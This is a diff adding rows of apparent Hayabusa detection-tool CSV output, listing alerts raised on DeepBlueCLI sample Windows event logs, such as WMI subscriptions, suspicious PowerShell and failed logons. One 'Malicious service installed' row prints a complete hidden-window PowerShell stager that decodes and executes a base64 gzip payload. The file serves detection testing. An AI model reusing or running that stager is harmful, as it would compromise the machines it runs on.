+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 01:56:48.190 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 02:39:39.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 03:46:19.937 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 03:46:20.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 03:57:18.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 03:57:20.937 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 04:55:50.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 04:55:51.755 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 04:57:52.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: SYyGmEHvgHiGYApk  :  Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADQdtlcCA7VWa2/aSBT93Er9D1aFZFslGAhtmkiVdszLhEcA82ZRNdhjM2TsIfY4PLr973sNdkK3zSpdaS2Q53HvzJlzz51rJ/ItQbkv7a3lQPr27u2bLg6wJykZ52s1K2UeREl98waGM65/27wla3PApC+SMkebTYV7mPqLm5tyFATEF6d+rk4ECkPiLRkloaJKf0njFQnIxd1yTSwhfZMyX3N1xpeYJWb7MrZWRLpAvh3PtbiFY0g5c8OoUOQ//5TV+UVhkas+RJiFimzuQ0G8nM2YrErf1XjDwX5DFLlNrYCH3BG5MfUvi7mhH2KHdGC1R9ImYsXtUFbhLPALiIgCXzo7VbzMyUiRodkNuIVsOyAh+OQa/iO/J0rGjxjLSn8o8wRDP/IF9QjMCxLwjUmCR2qRMGdg32akT5yF0iHb9OivdVLOncCqKwI1CyF5EWyb2xEjJ39Z/RluHEwVniSgwMH3d2/fvXXS4K8HpD3c4fP4Q+vN/NgmgFLp8pAeTb9I+azUhp2w4MEeuplBEBF1Ic3jGMwXCykTcee6M9GzLy9RSO3Bmn7UYWQ+4tRegEcSn4zX/WrcGUPK67NCPP+y3irEoT6p7H3sUSuVlPIr3onDyPHAudSsA9gUOZkgdoUw4mIRc5iV5j+7VT0qnnz1iDKbBMiC2IWACsKq/gjmFBZFbvht4gFbp74MUXBAyCS1TsS7T3eP+2AklxkOw6zUjSCTrKxkEsyInZWQH9JkCkWCH5vyM9x2xAS1cCjS5RbqP/lM9i1zPxRBZEEggYOBuSEWxSymJCsZ1Cb63qRuur/8S0LKmDHqu7DSIwQERmIiTBHLIwCoqRTUnElEw9sw4oHZMbtrDLuQy0kuHCWFXWLLL4FN1X6SdkxPyssZVIi5ybjISiMaCLgsYqpBX/8ZyNlF8QOkckCSOClpLs31vYjln9mutlbHEK1YtAlhR3oCAdTUAu7pOCSfSqYIgDjlvXZHywieacNnbUu/pwW0pYVGG/5DetnglSu7ebs2tKCyWzmoETbaRrfSM4zS4605Kgmz2hDNbkO0q5P12kRGfzgVswYyBjR/Py0dNrf0YLaQPd1pnw76YZvXd4e1azvTiuO4V47ZL3ys0da43NPzRdyqVKPWWN/q+VJYpVujR4e9+9uaWE5HDA8dzZ0UrjHdtYL1qMDbhwZC9dWldbh1RvVV295PDe16XLpHVYTKfnVU03lzqgeoq42wO+Lb5rrOxm4Z6TWLkllvWNN7vZqOhvX1Q+Vac8F3glf6eFSks82kv4J+DSA0tXypYZMDn/aApDpH2O2DjVsuWisHbCofkP6hw8Mivtc50sGmNnsAXNNNrctgfjAscjRinQlGrdm+pmmFabeEjDwd110UL4ldvYdR+Fg5VLTCyOb2+GNn6mijCbvSKuXBxnI0TdsalaY1K+w+312V9PxD2aMeWxZt7Xr4Wfe3Tbf76Nq98VV/19kvYb+hpo3ex/oBAWWW1+tJy/3kn+nhpQLQxkG4wgx0And6mr41HtSSe7rLaeyhKMdifU8CnzAoc1AIU8EjxrgV14r0RodSdSogC8jfITQvi79sqdKTofpcQNKhm5sZAIU0SsWdaxHfFatsfneZz0NByO9KeTjw6w9Y5pu98rRcNi4qT0yd78OO+6hxhmUObPbZ6+/+XyKT1F7By34Fkc9j/zL7KnLz2WcCfpr6ceC3mP5tBsaYCrA04Xpi5FRBXyQiEc/ZJ0cSJFCGkzzxF+BdJC468DHyN6LCQgBvCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:40:21.230 +09:00,IE10Win7,7045,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:40:21.261 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 05:40:21.464 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 07:54:48.533 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 11:07:47.443 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 11:19:46.459 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 22:57:54.520 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-19 23:00:17.112 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 05:09:55.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 05:09:57.843 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 05:47:29.854 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 06:47:30.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 08:02:19.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-20 08:02:22.296 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-21 01:03:05.348 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-21 05:05:57.517 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-21 05:05:59.973 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:00:11.001 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:03:27.106 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:42:09.518 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-22 06:47:30.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-08-22 06:49:00.074 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-23 09:12:59.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-23 09:13:02.546 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-23 11:24:05.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-25 06:17:07.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-25 06:17:10.203 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:28:38.656 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:30:06.203 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:38:23.076 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:51:10.232 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-25 06:51:19.681 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-26 00:03:05.603 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/deprecated/powershell_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 00:04:55.947 +09:00,IE10Win7,4688,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-26 05:43:45.515 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-26 05:43:48.140 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-26 05:58:46.881 +09:00,IE10Win7,4688,high,Suspicious PowerShell Invocations - Generic,,rules/sigma/deprecated/powershell_suspicious_invocation_generic.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-27 05:34:49.928 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-27 05:36:53.970 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-27 09:43:11.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-28 00:20:56.556 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
